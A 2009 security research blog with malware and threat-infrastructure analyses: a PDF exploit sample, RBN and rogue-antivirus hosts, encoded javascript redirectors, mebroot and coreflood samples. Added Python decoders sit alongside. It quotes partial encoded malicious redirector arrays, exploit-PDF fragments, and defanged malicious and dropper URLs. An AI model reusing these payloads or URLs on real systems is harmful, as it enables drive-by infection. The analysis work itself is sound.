Wednesday, September 2, 2009

Secunia PSI (RC3) - memory corruption

Secunia PSI (Release Candidate 3) appears to be vulnerable to some memory corruption conditions.
Issues of this kind are usually caught in release candidates. Bugs like these, IMHO, could support an analysis based on binary diffing across the historical releases of an application, in order to obtain a delta of the "critical" zones. But, again, it's only my opinion.

Anyway, the following screenshots show the JIT debugger (IDA Pro) behavior:

The first return point within the PSI process context



The second return point in the PSI.exe context



The third...



The fourth...



The fifth... I am able to count until five :)



The dialog box about it:



Feedback is welcome.

UPDATE: the vendor reports this issue as a bug related to a deprecated PSI release.

Sunday, July 26, 2009

something about CVE-2009-1862 PoC analysis

Well, starting from the hereEvil.pdf filename, it was decided to start (yet another) analysis of this critical vulnerability.

From the proof of concept found (http://www.milw0rm.com/exploits/9233):


begin 644 hereEvil.pdf
M)5!$1BTQ+C0*)"!;(#`N,3$Q,S,@+3`N,S(R-S4@,"XR,C$V.2`M
...
and so on... decoding the uuencoded data above (note the begin 644 header) gave the following result:

%PDF-1.4
%Çì�¢
1 0 obj
<< /Type /Catalog /Outlines 3 0 R /Pages 4 0 R /Dests 5 0 R /AcroForm 6 0 R /Names 7 0 R /Threads 8 0 R /PageLayout /SinglePage /ViewerPreferences << /PageDirection /L2R >>
>>
endobj
2 0 obj
<< /Creator (Scribus 1.3.3.13) /Producer (Scribus PDF Library 1.3.3.13) /Title <>
/Author <>
/Keywords <>
/CreationDate (D:20090711081156)
/ModDate (D:20090711081156)
/Trapped /False


and so on... a well-known PDF format file was obtained.

Within this "evil" PDF file, some object encoding definitions are written as follows:

9 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [ 0.11133 -0.32275 0.22169 -1.01367 ]
/Resources << /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
>>
/Length 263
/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>
stream


and another one:

29 0 obj
<< /Type /XObject /Subtype /Image /Width 272 /Height 345 /ColorSpace /DeviceRGB /BitsPerComponent 8 /Length 5280 /Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>
stream
...


Within the evil PDF file there are many more objects defined in this manner.


The string:

/#46#6c#61#74#65#44#65#63#6f#64#65

is a PDF name object with every character written as a #xx hexadecimal escape (#46 = 'F', #6c = 'l', #61 = 'a', ...), and stands for:

/FlateDecode

So from this point it is possible to proceed with the usual analysis techniques.
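The hex-escape trick above is worth automating, because the same obfuscated name appears in many objects and a plain string search for /FlateDecode (or /JavaScript, /OpenAction) misses all of them. The following Python is an added example, not code from the original post or from the PoC: it decodes #xx escapes in PDF name tokens, lists the obfuscated names found in a file, and rewrites them so a downstream string scanner sees the plain form. The sample bytes are constructed from the 9 0 obj dictionary quoted above plus a second object added here (an escaped /JavaScript name and a name with an escaped space) to exercise the edge cases; they are not the real hereEvil.pdf.

```python
import re

# Constructed sample: the "9 0 obj" dictionary quoted in the post, followed by
# a second object added here (not from hereEvil.pdf) with an escaped
# /JavaScript name and a name containing an escaped space.
SAMPLE_PDF = (
    b"9 0 obj\n<<\n/Type /XObject\n/Subtype /Form\n/FormType 1\n"
    b"/BBox [ 0.11133 -0.32275 0.22169 -1.01367 ]\n"
    b"/Resources << /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]\n>>\n"
    b"/Length 263\n/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>\nstream\n"
    b"...\nendstream\nendobj\n"
    b"10 0 obj\n<< /S /#4a#61#76#61#53#63#72#69#70#74 /JS (app.alert(1)) "
    b"/Name /A#20B >>\nendobj\n"
)

# A name token is '/' followed by regular characters: anything that is not
# PDF whitespace or a delimiter. '#' counts as regular, which is exactly why
# the #xx escape (ISO 32000-1 s. 7.3.5) can hide /FlateDecode from grep.
_NAME_RE = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
_ESC_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
_REGULAR_RANGE = range(0x21, 0x7f)
_DELIMITERS = b"()<>[]{}/%#"


def decode_name(raw):
    """Resolve every #xx escape in a name token (given without the '/')."""
    return _ESC_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def find_obfuscated_names(pdf):
    """Unique (as written, decoded) pairs for every name that uses escapes."""
    found = set()
    for m in _NAME_RE.finditer(pdf):
        raw = m.group(1)
        if b"#" in raw:
            found.add(("/" + raw.decode("latin-1"), "/" + decode_name(raw)))
    return sorted(found)


def _safe_unescape(m):
    """Unescape only when the result is still a regular character. A byte
    that decodes to whitespace, a delimiter or '#' would change how the
    file tokenizes, so that escape is left exactly as it was."""
    b = int(m.group(1), 16)
    if b not in _REGULAR_RANGE or b in _DELIMITERS:
        return m.group(0)
    return bytes([b])


def normalize_pdf_names(pdf):
    """Rewrite name tokens so a plain string scanner (grep, YARA, an AV
    signature) sees /FlateDecode and /JavaScript; nothing else is touched."""
    return _NAME_RE.sub(lambda m: b"/" + _ESC_RE.sub(_safe_unescape, m.group(1)), pdf)


if __name__ == "__main__":
    for written, plain in find_obfuscated_names(SAMPLE_PDF):
        print(f"{written}  ->  {plain}")
```

Run it against a suspicious PDF by reading the file as bytes and passing it to find_obfuscated_names; the normalized output of normalize_pdf_names can then be fed to whatever signature scanner was being evaded. Escapes that decode to a delimiter, a whitespace byte or '#' are deliberately kept (here /A#20B stays as written), since resolving them would alter the file's tokenization.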


Monday, July 13, 2009

something more about "Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution"

A good keyword for searching for info about new "big vendors" vulnerabilities is "roadmap" :). Sometimes it is very useful, I think. Oops! another "good bug hunter trick" has just been full-disclosed.

http://blogs.msdn.com/excel/archive/2006/07/17/668544.aspx

Anyway... The CLSIDs for this threat are:

{0002E541-0000-0000-C000-000000000046}
{0002E559-0000-0000-C000-000000000046}

Check the following Registry entry:



and




Advisory: http://www.microsoft.com/technet/security/advisory/973472.mspx

KB article: http://support.microsoft.com/kb/973472

CVE: CVE-2009-1136

method affected: msDataSourceObject

PoC: http://en.securitylab.ru/poc/extra/382458.php

The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System

Finally, after a few days I have received my copy of:
The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System



Source: http://www.jbpub.com/covers/newlarge/1598220616.jpg

I think that this is the best book on Windows rootkit development and countermeasures.

Friday, June 19, 2009

some nine-ball information - part 0.1

The following information is intended as a starting point for analysing "nine-ball".

Starting from rnw.kz domain:



querying the NS, the following was obtained:



The last HTTP redirection stage (via malzilla):



Info for stopssse.info:




Wednesday, June 10, 2009

is static.202.88.46.78.clients.your-server.de a log collector for RBN? - part 0.4

During some attempts to study RBN, something interesting was found. Let's start from the following rogue antivirus spreading URL:

http:\\www.total-virusprotection.com

From robtex:



More interesting information about 92.241.176.220 is discovered by asking, again via ROBTEX, for other details:




That appears to be a list of possible name servers and hostnames for other rogue antivirus domains. Returning to the original URL http:\\www.total-virusprotection.com, let's try to identify the authoritative nameserver for the domain total-virusprotection.com. Again with robtex:



As shown in the screenshot above, there seem to be two authoritative name servers:

- ns1.total-virusprotection.com (89.149.254.55)
- ns2.total-virusprotection.com (78.46.88.202)

Using the last IP address as an HTTP URL in a web browser, the following "Index of /" page appears:



It seems like a log repository folder. Moreover, there is another folder named "logs" that contains the "csp" subfolder:




The log files that were analyzed contain information about the activities carried out by the web client: for instance the OS, the URL visited, which Flash stream the client requested, as well as which domains were requested by the clients, and other activities. The following screenshots show three types of logs found in the folders above (the IP addresses were deliberately removed):


The content of a file within "Index of /"


another one (again from "Index of /")



another one, but from the /logs/csp folder

In the second screenshot above some of the (removed) IP addresses are related to other domains that are considered suspect; certain ones, however, are reported as RBN C&C. Also, exploring the timeline, some logs are bigger than others, as if to prove a massive campaign of possible malware propagation:



As always, the inevitable screenshot of the particulars concerning the ASN:



Reannouncement (date 2009-06-08) between AS8492 OBIT-AS Obit Telecommunications, St.Petersburg, Russia and AS24940 HETZNER-AS Hetzner Online AG RZ-Nuernberg

Thursday, May 28, 2009

bulkbin.cn - russian business network related. it may be - part 0.3

It's been found that 174.133.202.181 (bulkbin.cn) may be related to RBN. The following screenshot shows the RBN detection rules from the emergingthreats.net updated list:



http://www.emergingthreats.net/rules/emerging-rbn.rules

Tuesday, May 26, 2009

bulkbin.cn - name server - part 0.2

The following pictures show the name servers for bulkbin and others (xgguys.com...):




whois 174.133.202.178

%rwhois V-1.5:003eff:00 whois.theplanet.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:NETBLK-THEPLANET-BLK-15
network:Auth-Area:174.132.0.0/15
network:Network-Name:TPIS-BLK-174-133-202-0
network:IP-Network:174.133.202.176/28
network:IP-Network-Block:174.133.202.176 - 174.133.202.191
network:Organization-Name:Anton Pershin
network:Organization-City:Moscow
network:Organization-State:vv
network:Organization-Zip:127254
network:Organization-Country:RUS
network:Description-Usage:customer
network:Server-Pri:ns1.theplanet.com
network:Server-Sec:ns2.theplanet.com
network:Tech-Contact;I:abuse@theplanet.com
network:Admin-Contact;I:abuse@theplanet.com
network:Created:20080623
network:Updated:20080624

%ok

generic unpacking of self-modifying, aggressive, packed binary programs

a good paper from Piotr Bania
http://piotrbania.com/all/articles/pbania-dbi-unpacking2009.pdf

from the paper, the following excellent malware analysis web site was found:
https://aerie.cs.berkeley.edu

Sunday, May 24, 2009

bulkbin.cn - strange AS - part 0.1

Hi there,

looking around, some URLs related to bulkbin.cn were found.

The following malicious URLs were found (replace \ with / if you are interested):

http:\\azure.rr.nu\
http:\\adolas.passingg.as\
http:\\cemuryje.byinter.net\
http:\\costens.byinter.net\
http:\\colifit.redirect.hm\

For each of the URLs above there is a common point: a javascript redirector.

Specifically, the following reports for each URL the name of the javascript redirector, an abstract of the array that contains the encoded HTML redirector, and the key for obtaining the clear HTML code:

http:\\azure.rr.nu\
javascript redirector:
yfoqklmcoxthgybyu.js
abstract of array that contains HTML redirector:
var str = ["206", "217", "205", "223", "215", "207", "216", "222", "152", "225", "220", "211", "222", "207", "146", "145", "166", "206", "211", "224", "138", "221", "222", "227", "214", "207", "167", "140", "217", "224", "207", "220", "208", "214", "217", "225", "164", "203", "223", "222", "217", "165", "138", "210", "207", "211", "209", "210", "222", "164", "138", "155", "218", "226", "165", "138", "225", "211", "206", "222", "210", "164", "138", "160", "154", "154", "218", "226", "165", "140", "168", "145", "147", "165", "119", "116", "206", "217", "205", "223", "215", "207", "216", "222", "152", "225", "220", "211", "222", "207", "146", "145", "166", "222", "203", "204", "214", "207", "138", "225", "211", "206", "222", "210", "167", "140", "155", "154", "154", "143", "140", "168", "145", "147", "165", "119", "116", "206", "217", "205", "223", "215", "207", "216", "222", "152", "225", "220", "211", "222", "207", "146", "145", "166", "222", "220", "168", "145", "147", "165", "119", "116", "206", "217", "205", "223", "215", "207", "216", "222", "152", "225", "220", "211", "222", "207", "146", "145", "166", "222", "206", "138", "211", "206", "167", "140", "208", "211", "220", "221", "222", "140", "168", "190", "210", "211", "221", "138", "211", "221"....
decoder key:
ss = str[i] - 106;

http:\\adolas.passingg.as\
javascript redirector:
tqewcmvdltvtunbrozlo.js
abstract of array that contains HTML redirector:
var str = ["713", "724", "712", "730", "722", "714", "723", "729", "659", "732", "727", "718", "729", "714", "653", "652", "673", "713", "718", "731", "645", "728", "729", "734", "721", "714", "674", "647", "724", "731", "714", "727", "715", "721", "724", "732", "671", "710", "730", "729", "724", "672", "645", "717", "714", "718", "716", "717", "729", "671", "645", "662", "725", "733", "672", "645", "732", "718", "713", "729", "717", "671", "645", "667", "661", "661", "725", "733", "672", "647", "675", "652", "654", "672", "626", "623", "713", "724", "712", "730", "722", "714", "723", "729", "659", "732", "727", "718", "729", "714", "653", "652", "673", "729", "710", "711", "721", "714", "645", "732", "718", "713", "729", "717", "674", "647", "662", "661", "661", "650", "647", "675", "652", "654", "672", "626", "623", "713", "724", "712", "730", "722", "714", "723", "729", "659", "732", "727", "718", "729", "714", "653", "652", "673", "729", "727", "675", "652", "654", "672", "626", "623", "713", "724", "712", "730", "722", "714", "723", "729", "659", "732", "727", "718", "729", "714", "653", "652", "673", "729", "713", "645", "718", "713", "674", "647", "715", "718", "727", "728", "729", "647", "675", "697", "717", "718", "728", "645", "718", "728",....
decoder key:
ss = str[i] - 613;

http:\\cemuryje.byinter.net\
javascript redirector:
iddcvesism.js
abstract of array that contains HTML redirector:
var str = ["558", "569", "557", "575", "567", "559", "568", "574", "504", "577", "572", "563", "574", "559", "498", "497", "518", "558", "563", "576", "490", "573", "574", "579", "566", "559", "519", "492", "569", "576", "559", "572", "560", "566", "569", "577", "516", "555", "575", "574", "569", "517", "490", "562", "559", "563", "561", "562", "574", "516", "490", "507", "570", "578", "517", "490", "577", "563", "558", "574", "562", "516", "490", "512", "506", "506", "570", "578", "517", "492", "520", "497", "499", "517", "471", "468", "558", "569", "557", "575", "567", "559", "568", "574", "504", "577", "572", "563", "574", "559", "498", "497", "518", "574", "555", "556", "566", "559", "490", "577", "563", "558", "574", "562", "519", "492", "507", "506", "506", "495", "492", "520", "497", "499", "517", "471", "468", "558", "569", "557", "575", "567", "559", "568", "574", "504", "577", "572", "563", "574", "559", "498", "497", "518", "574", "572", "520", "497", "499", "517", "471", "468", "558", "569", "557", "575", "567", "559", "568", "574", "504", "577", "572", "563", "574", "559", "498", "497", "518", "574", "558", "490", "563", "558", "519", "492", "560", "563", "572", "573", "574", "492", "520", "542", "562", "563", "573", "490", "563", "573",
decoder key:
ss = str[i] - 458;

http:\\costens.byinter.net\
javascript redirector:
dmozgpkfxiusbwf.js
abstract of array that contains HTML redirector:
var str = ["990", "1001", "989", "1007", "999", "991", "1000", "1006", "936", "1009", "1004", "995", "1006", "991", "930", "929", "950", "990", "995", "1008", "922", "1005", "1006", "1011", "998", "991", "951", "924", "1001", "1008", "991", "1004", "992", "998", "1001", "1009", "948", "987", "1007", "1006", "1001", "949", "922", "994", "991", "995", "993", "994", "1006", "948", "922", "939", "1002", "1010", "949", "922", "1009", "995", "990", "1006", "994", "948", "922", "944", "938", "938", "1002", "1010", "949", "924", "952", "929", "931", "949", "903", "900", "990", "1001", "989", "1007", "999", "991", "1000", "1006", "936", "1009", "1004", "995", "1006", "991", "930", "929", "950", "1006", "987", "988", "998", "991", "922", "1009", "995", "990", "1006", "994", "951", "924", "939", "938", "938", "927", "924", "952", "929", "931", "949", "903", "900", "990", "1001", "989", "1007", "999", "991", "1000", "1006", "936", "1009", "1004", "995", "1006", "991", "930", "929", "950", "1006", "1004", "952", "929", "931", "949", "903", "900", "990", "1001", "989", "1007", "999", "991", "1000", "1006", "936", "1009", "1004", "995", "1006", "991", "930", "929", "950", "1006", "990", ...
decoder key:
ss = str[i] - 890;

http:\\colifit.redirect.hm\
javascript redirector:
cajhrwljjnwerpvjrriw.js
abstract of array that contains HTML redirector:
var str = ["882", "893", "881", "899", "891", "883", "892", "898", "828", "901", "896", "887", "898", "883", "822", "821", "842", "882", "887", "900", "814", "897", "898", "903", "890", "883", "843", "816", "893", "900", "883", "896", "884", "890", "893", "901", "840", "879", "899", "898", "893", "841", "814", "886", "883", "887", "885", "886", "898", "840", "814", "831", "894", "902", "841", "814", "901", "887", "882", "898", "886", "840", "814", "836", "830", "830", "894", "902", "841", "816", "844", "821", "823", "841", "795", "792", "882", "893", "881", "899", "891", "883", "892", "898", "828", "901", "896", "887", "898", "883", "822", "821", "842", "898", "879", "880", "890", "883", "814", "901", "887", "882", "898", "886", "843", "816", "831", "830", "830", "819", "816", "844", "821", "823", "841", "795", "792", "882", "893", "881", "899", "891", "883", "892", "898", "828", "901", "896", "887", "898", "883", "822", "821", "842", "898", "896", "844", "821", "823", "841", "795", "792", "882", "893", "881", "899", "891", "883", "892", "898", "828", "901", "896", "887", "898", "883", "822", "821", "842", "898", "882", "814", "887", "882", "843", "816", "884", "887", "896", "897", "898", "816", "844", "866", "886", "887", "897",
decoder key:
ss = str[i] - 782;
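The five redirectors differ only in the subtraction key, and each key above was read out of its script by hand. The following Python is an added example, not code from the post or from the redirectors themselves: it parses the `var str = [...]` literal (tolerating the truncated abstracts as printed), applies the decoder `ss = str[i] - key`, and recovers the key without reading the script by scanning the narrow band of keys that keeps every value in printable ASCII for the one that makes the `document.write` crib appear. The two sample arrays are the opening values quoted above for azure.rr.nu and adolas.passingg.as; the rest of each array is not on the page, so only those prefixes are decoded, and the crib is an assumption that holds for all five samples shown.

```python
import re

# Opening values of two of the arrays quoted in the post (azure.rr.nu and
# adolas.passingg.as). The page truncates every array with "....", so only
# these prefixes are reproduced; the trailing "...." is kept on purpose to
# show the parser tolerates the abstracts exactly as printed.
SAMPLE_AZURE = (
    'var str = ["206", "217", "205", "223", "215", "207", "216", "222", "152", '
    '"225", "220", "211", "222", "207", "146", "145", "166", "206", "211", "224", '
    '"138", "221", "222", "227", "214", "207", "167", "140", "217", "224", '
    '"207", "220", "208", "214", "217", "225", "164", "203", "223", "222", '
    '"217", "165", "138", "210", "207", "211", "209", "210", "222", "164", '
    '"138", "155", "218", "226", "165", "138", "225", "211", "206", "222", '
    '"210", "164", "138", "160", "154", "154", "218", "226", "165", "140", '
    '"168", "145", "147", "165", "119", "116"....'
)
SAMPLE_ADOLAS = (
    'var str = ["713", "724", "712", "730", "722", "714", "723", "729", "659", '
    '"732", "727", "718", "729", "714", "653", "652", "673"....'
)


def parse_array(js_text):
    """Pull the quoted decimal values out of a `var str = [...]` literal.
    Works on the truncated abstracts too: the trailing '....' is ignored."""
    m = re.search(r"var\s+str\s*=\s*\[(.*)", js_text, re.S)
    body = m.group(1) if m else js_text
    return [int(v) for v in re.findall(r'"(\d+)"', body)]


def decode_array(values, key):
    """The redirector's own loop: ss += chr(str[i] - key)."""
    return "".join(chr(v - key) for v in values)


def _looks_like_text(s):
    return all(" " <= c <= "~" or c in "\t\r\n" for c in s)


def recover_key(values, crib="document.write"):
    """Recover the subtraction key without reading the script. Only keys in
    [max - 126, min - 9] map every value onto printable ASCII (plus tab, CR,
    LF), and within that band exactly one key makes the crib appear, since
    every sample in the post opens with a document.write call. Returns None
    when no key fits (wrong crib, or not this family of redirector)."""
    lo = max(values) - 126
    hi = min(values) - 9
    for key in range(lo, hi + 1):
        plain = decode_array(values, key)
        if _looks_like_text(plain) and crib in plain:
            return key
    return None


def decode_redirector(js_text):
    """Parse, recover the key, decode. Returns (key, html)."""
    values = parse_array(js_text)
    key = recover_key(values)
    if key is None:
        raise ValueError("no key yields printable text containing the crib")
    return key, decode_array(values, key)


if __name__ == "__main__":
    for sample in (SAMPLE_AZURE, SAMPLE_ADOLAS):
        key, html = decode_redirector(sample)
        print(f"key = {key}: {html!r}")
```

Paste the full `var str = [...]` line of any of the five scripts into decode_redirector to get the complete HTML redirector; the recovered keys for the two prefixes embedded here are 106 and 613, matching the values read from the scripts above.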

The following screenshot shows the full decoded HTML redirector, common to all the URLs above:



As shown, there is a spreading web site based on (IMHO) a fake CGI script. Trying with malzilla to retrieve the malicious URL using only one "CGI" parameter, another redirection stage was discovered:



Making the HTTP GET request to simulate the redirection for the URL http:\\agentival.info\scan\download.php?said=10&ver=1.0.6, a suspicious "install.exe" file appears.

From my submission to ThreatExpert there was no info about the binary:

http://www.threatexpert.com/report.aspx?md5=14077ad65fc28afa12b0f1b13c373f96

Only McAfee recognizes the binary, as "new malware".

A first look at it with IDA shows some URLs:



The ip address 174.133.202.181 is the DNS A record for bulkbin.cn

Some net info:

robtex response for 174.133.202.181:



robtex response for bulkbin.cn:


"AS? ???"


whois xgguy.com.theplanet.host ?
The "AS?" may be generated for the following reason: the existence within the DNS records of a host that resolves only "in zone", like xgguy.com.theplanet.host.

A strange behavior is the following:
The only AS (AS21844) detected in the picture above for the 24th of April 2009 was linked to the rest of the world in this manner:




While on the 6th of May 2009 there was a route withdrawal with all the others, so:



Some notes:
- I know that this may depend on a misconfiguration or on a lack of routing source data used by BGPlay.
- AS21844 THEPLANET-AS2 ThePlanet.com Internet Services, Inc. may be a backup AS.

Feedback is welcome.

Friday, May 22, 2009

an irc server - part 0.1

Hi there,
during a survey activity the following IRC server was found:

main.updateserver.cn (67.202.89.34)

Searching on Google, the only information about it is from threatexpert.com:
http://www.threatexpert.com/report.aspx?md5=f699946ecde2c669adfbbaf4f019fc03
it seems related to pushbot.

The following mIRC screenshots show the IRC server banner:




whois:

$ whois 67.202.89.34

OrgName: NoZone, Inc.
OrgID: NOZON
Address: 350 E. Cermak Rd.
Address: Suite 240
City: Chicago
StateProv: IL
PostalCode: 60616
Country: US
ReferralServer: rwhois://rwhois.steadfast.net:4321
NetRange: 67.202.64.0 - 67.202.127.255
CIDR: 67.202.64.0/18
OriginAS: AS32748
NetName: STEADFAST-3
NetHandle: NET-67-202-64-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.STEADFAST.NET
NameServer: NS2.STEADFAST.NET
NameServer: NS3.STEADFAST.NET
NameServer: NS4.STEADFAST.NET
Comment: Please submit all reports of abuse to
Comment: abuse@steadfast.net. Reports sent to other
Comment: addresses will not be processed.
RegDate: 2007-08-09
Updated: 2008-07-15
RAbuseHandle: ABUSE959-ARIN
RAbuseName: Steadfast Networks Abuse Department
RAbusePhone: +1-312-602-2689
RAbuseEmail: abuse@steadfast.net
RNOCHandle: NOG3-ARIN
RNOCName: Steadfast Networks Network Operations Center
RNOCPhone: +1-312-602-2689
RNOCEmail: noc@steadfast.net
RTechHandle: NOG3-ARIN
RTechName: Steadfast Networks Network Operations Center
RTechPhone: +1-312-602-2689
RTechEmail: noc@steadfast.net
OrgAbuseHandle: ABUSE959-ARIN
OrgAbuseName: Steadfast Networks Abuse Department
OrgAbusePhone: +1-312-602-2689
OrgAbuseEmail: abuse@steadfast.net
OrgNOCHandle: NOG3-ARIN
OrgNOCName: Steadfast Networks Network Operations Center
OrgNOCPhone: +1-312-602-2689
OrgNOCEmail: noc@steadfast.net
OrgTechHandle: NOG3-ARIN
OrgTechName: Steadfast Networks Network Operations Center
OrgTechPhone: +1-312-602-2689
OrgTechEmail: noc@steadfast.net
# ARIN WHOIS database, last updated 2009-05-21 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Found a referral to rwhois.steadfast.net:4321.
%rwhois V-1.0,V-1.5:00090h:00 manage.steadfast.net (Ubersmith RWhois Server V-1.0)
autharea=67.202.64.0/18
xautharea=67.202.64.0/18
network:Class-Name:network
network:Auth-Area:67.202.64.0/18
network:ID:NET-3622.67.202.88.0/22
network:Network-Name:IP Pool
network:IP-Network:67.202.88.0/22
network:IP-Network-Block:67.202.88.0 - 67.202.91.255
network:Org-Name:Verity LLC
network:Street-Address:8622 Merlin Dr.
network:City:Houston
network:State:TX
network:Postal-Code:77055
network:Country-Code:US
network:Tech-Contact:MAINT-3622.67.202.88.0/22
network:Created:20080714202141000
network:Updated:20080714202141000
network:Updated-By:admin@steadfast.net
network:POC-Name:Steadfast Networks
network:POC-Email:admin@steadfast.net
network:POC-Phone:312-602-2689
network:Tech-Name:Steadfast Networks
network:Tech-Email:admin@steadfast.net
network:Tech-Phone:312-602-2689


Cymru whois:

AS | IP | BGP Prefix | CC | Allocated | AS Name
32748 |67.202.89.34 |67.202.64.0/19 |US |2007-08-09|STEADFAST-NoZone,Inc.

Thursday, May 21, 2009

another approach - trying to analyze mebroot (torpig) - part 0.6

Starting from 0x53d03e99cfbfaa0df3695c27b2b5f364, a pedantic anti-debugging technique was detected (IMHO). Specifically, in this case the authors used a pushf/popf trick. Since the pushf/popf anti-debugging technique seems to require writing a custom exception handler to handle the SINGLE_STEP exception, and since I don't want to use this approach for a trojan that is already fully documented on the net, I decided to start with classical analysis tools such as filemon (sysinternals.com). The following screenshots show the creation of two files (one .exe and one .dll) named 31.tmp and 32.tmp:


creation of 31.tmp (.exe component)
md5: 0x4c57e1af6d0dff3a64c3f31a1646fb2a

http://www.threatexpert.com/report.aspx?md5=4c57e1af6d0dff3a64c3f31a1646fb2a



creation of 32.tmp (.dll component)
md5: 0xfee2385af796a198a7822ad7d0d7ad88
http://www.threatexpert.com/report.aspx?md5=fee2385af796a198a7822ad7d0d7ad88


During the analysis with filemon, it was shown that the .exe component (created and launched by the spreader) drops the .dll component. The DLL, as usual, is used by svchost.exe.



gumblar.cn and martuz.cn are dead

robtex for gumblar.cn:



robtex for martuz.cn:



Wednesday, May 20, 2009

afcore - trying to analyze coreflood - part 0

md5:0x9054ce104254794fb0511d18bbe40ef5

VirusTotal:
http://www.virustotal.com/reanalisis.html?caf6f942e79dcaea76c2792959d52768

ThreatExpert:
http://www.threatexpert.com/report.aspx?md5=9054ce104254794fb0511d18bbe40ef5


Some net related info:

the ThreatExpert analysis detected HTTP requests for the following URL:
http://secure.termobite.ws/forum/f7810f/44513dd/7c2891f/4/22b332c


robtex:

whois:



netcraft:


Some notes:

At this time the URL appears to be no longer active. Searching with Google, the URL seems to have been active since 2008 and is present in some reports about other afcore variants.

Carrying out some tests using the URL, a redirection was identified, as shown in the following (note that the behavior is the same for a browser, wget and curl; the user-agent is not important):

$ wget http://secure.termobite.ws/forum/

--xx:xx:xx-- http://secure.termobite.ws/forum
=> `forum'
Resolving secure.termobite.ws... 209.85.100.7
Connecting to secure.termobite.ws|209.85.100.7|:80..
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://node3.border.znet/forum/ [following]
--xx:xx:xx-- http://node3.border.znet/forum/
=> `index.html'
Resolving node3.border.znet... failed: Unknown host.

Is node3.border.znet an "internal" coreflood node? Playing with the domain name and TLD, this was found: node3.border.znet obviously doesn't exist, but node3.borderz.net does. So what about it?

An HTTP GET request for node3.borderz.net redirects to the following web site:
http://sedoparking.com/search/registrar.php?domain=borderz.net&registrar=sedopark

The log of wget:

$ wget node3.borderz.net
--xx:xx:xx-- http://node3.borderz.net/
=> `index.html'
Resolving node3.borderz.net... 82.98.86.177
Connecting to node3.borderz.net|82.98.86.177|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: http://sedoparking.com/search/registrar.php?domain=borderz.net&registrar=sedopark [following]
--xx:xx:xx-- http://sedoparking.com/search/registrar.php?domain=borderz.net&registrar=sedopark
=> `registrar.php@domain=borderz.net&registrar=sedopark'
Resolving sedoparking.com... 82.98.86.180
Connecting to sedoparking.com|82.98.86.180|:80... connected.
HTTP request sent, awaiting response... 200 OK
Cookie coming from sedoparking.com attempted to set domain to borderz.net
Length: unspecified [text/html]

[ <=> ] 81,810 53.44K/s

xx:xx:xx (53.34 KB/s) - `registrar.php@domain=borderz.net&registrar=sedopark' saved [81810]

sedoparking.com\search\registrar.php?domain=borderz.net&registrar=sedopark




Is coreflood related to financial stuff? YES.
In the screenshot above we can see scam links about financial services.

Too many strange coincidences. But it may be a coincidence and nothing more.

Feedback is welcome.

Monday, May 18, 2009

pushfd popfd - SEH and anti-debugging

http://www.openrce.org/forums/posts/445#1443

Thursday, May 14, 2009

first look - trying to analyze mebroot (torpig) - part 0.5

My submission to threatexpert.com for md5 0x53d03e99cfbfaa0df3695c27b2b5f364 (sinowal/mebroot and, I hope, torpig related):
http://www.threatexpert.com/report.aspx?md5=53d03e99cfbfaa0df3695c27b2b5f364

How virustotal.com detects 0x53d03e99cfbfaa0df3695c27b2b5f364:
http://www.virustotal.com/analisis/65ccef31523490ed798110dab5bf884e

What ArmInline shows for 0x53d03e99cfbfaa0df3695c27b2b5f364 run under ollydbg:




It seems packed, but not UPXed. Armadillo or something similar may have been used. As shown, there are a lot of int 3 instructions (usually an anti-debugging technique marker).

got it ? - trying to analyze mebroot (torpig) - part 0.4

It was discovered by using an alias for mebroot (sinowal) as a search keyword.
So, trying to retrieve one of the latest samples, the following was discovered:

md5: 0xba1f006b05e898c0e4a61458cd981870
or
md5: 0x53d03e99cfbfaa0df3695c27b2b5f364

URL:hxxp://----------.----/cgi-bin/index.cgi?ECVCEzzEZzZZsZrZZMzClEkuuMZEZZZZZZZZZMMkVkuukZZZZzZkZlZZZZZZZZzOZ

At this time the URL, like a fast bulk place, doesn't provide anything.

Feedback is welcome.

Wednesday, May 13, 2009

AS whois (cymru whois service) script

This is a simple PoC bash script for retrieving AS info (ASN and prefix) from the Team Cymru whois service for a given list of IP addresses. It is designed to work in a separate folder, and the input file is a simple IP address list. For each IP the script creates a separate file (named after the IP) and a single global log file where all responses are saved.

So for faster and better use, follow these steps:

- create a directory
- create a file that contains your activity ip addresses
- copy the script and ip list within the directory
- run the script
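The script itself survives only as a screenshot, so here is an added Python equivalent (not the author's bash script) that does what the four steps describe: it reads the IP list, sends a single bulk begin/verbose/end query to whois.cymru.com on TCP/43, and writes one file per IP plus a global log in the chosen directory. The sample response is constructed: its data line is the 67.202.89.34 lookup quoted in the "an irc server" post on this page, while the banner line is an assumed placeholder. The allocation date and AS name are read from the end of each line so the parser keeps working if the service adds a middle column.

```python
import socket
import sys
from pathlib import Path

CYMRU_HOST = "whois.cymru.com"
CYMRU_PORT = 43

# Constructed sample response: the banner line is an assumed placeholder; the
# header and data line are the 67.202.89.34 lookup quoted in the post above.
SAMPLE_RESPONSE = (
    "Bulk mode; whois.cymru.com [2009-05-22 00:00:00 +0000]\n"
    "AS |IP |BGPPrefix |CC |Allocated|ASName\n"
    "32748 |67.202.89.34 |67.202.64.0/19 |US |2007-08-09|STEADFAST-NoZone,Inc.\n"
)


def build_bulk_query(ips):
    """Wrap the IPs in begin/end so one TCP session answers all of them;
    'verbose' asks for BGP prefix, CC, allocation date and AS name.
    Blank lines and surrounding whitespace in the list are ignored."""
    wanted = [ip.strip() for ip in ips if ip.strip()]
    return "\n".join(["begin", "verbose"] + wanted + ["end"]) + "\n"


def parse_response(text):
    """Map each IP to its fields. The banner ('Bulk mode ...') and the
    header ('AS | IP | ...') are skipped; allocation date and AS name are
    taken from the end of the line because the number of middle columns
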